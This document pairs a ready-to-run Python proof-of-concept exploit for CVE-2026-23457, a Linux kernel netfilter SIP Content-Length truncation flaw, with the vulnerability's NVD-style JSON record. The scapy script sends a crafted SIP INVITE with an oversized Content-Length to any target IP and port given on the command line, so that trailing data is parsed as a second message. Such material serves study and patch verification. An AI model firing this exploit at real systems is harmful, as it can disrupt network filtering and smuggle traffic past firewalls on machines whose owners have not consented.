CVE-2026-23457

#!/usr/bin/env python3 """ PoC for CVE-2026-23457: Linux Kernel Netfilter SIP Integer Truncation This script crafts a malicious SIP packet with a Content-Length larger than UINT_MAX. """ import sys from scapy.all import IP, TCP, Raw, send def send_sip_poc(target_ip, target_port): # Content-Length: 2^32 + 32 (4294967328). On 64-bit, this truncates to 32. # The parser will read 32 bytes as the body, then process the rest as a new message. payload = ( b"INVITE sip:[email protected] SIP/2.0\r\n" b"Via: SIP/2.0/TCP 192.168.1.2:5060;branch=z9hG4bK-poc\r\n" b"Max-Forwards: 70\r\n" b"To: <sip:[email protected]>\r\n" b"From: <sip:[email protected]>;tag=12345\r\n" b"Call-ID: [email protected]\r\n" b"CSeq: 1 INVITE\r\n" b"Contact: <sip:[email protected]>\r\n" b"Content-Type: application/sdp\r\n" b"Content-Length: 4294967328\r\n" b"\r\n" b"A" * 32 # Data consumed by the truncated length b"INVITE sip:[email protected] SIP/2.0\r\n" # Data parsed as new message b"Content-Length: 0\r\n\r\n" ) packet = IP(dst=target_ip) / TCP(dport=target_port, sport=5060, flags="PA") / Raw(load=payload) send(packet, verbose=1) if __name__ == "__main__": if len(sys.argv) != 3: print(f"Usage: {sys.argv[0]} <target_ip> <target_port>") sys.exit(1) send_sip_poc(sys.argv[1], int(sys.argv[2]))

{"cve": {"id": "CVE-2026-23457", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:32.473", "lastModified": "2026-04-27T14:16:34.210", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_sip: fix Content-Length u32 truncation in sip_help_tcp()\n\nsip_help_tcp() parses the SIP Content-Length header with\nsimple_strtoul(), which returns unsigned long, but stores the result in\nunsigned int clen. On 64-bit systems, values exceeding UINT_MAX are\nsilently truncated before computing the SIP message boundary.\n\nFor example, Content-Length 4294967328 (2^32 + 32) is truncated to 32,\ncausing the parser to miscalculate where the current message ends. The\nloop then treats trailing data in the TCP segment as a second SIP\nmessage and processes it through the SDP parser.\n\nFix this by changing clen to unsigned long to match the return type of\nsimple_strtoul(), and reject Content-Length values that exceed the\nremaining TCP payload length."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "references": [{"url": "https://git.kernel.org/stable/c/528b4509c9dfc272e2e92d811915e5211650d383", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/75fcaee5170e7dbbee778927134ef2e9568b4659", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/865dba58958c3a86786f89a501971ab0e3ec6ba9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/b75209debb9adab287b3caa982f77788c1e15027", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/cd1b7403ec835f8a0b3f1f7e68ac26af2cb1e42f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/d4f17256544cc37f6534a14a27a9dec3540c2015", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/ed81b6a7012485acdb9c6c80735a0b7d8e5e1873", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fbce58e719a17aa215c724473fd5baaa4a8dc57c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}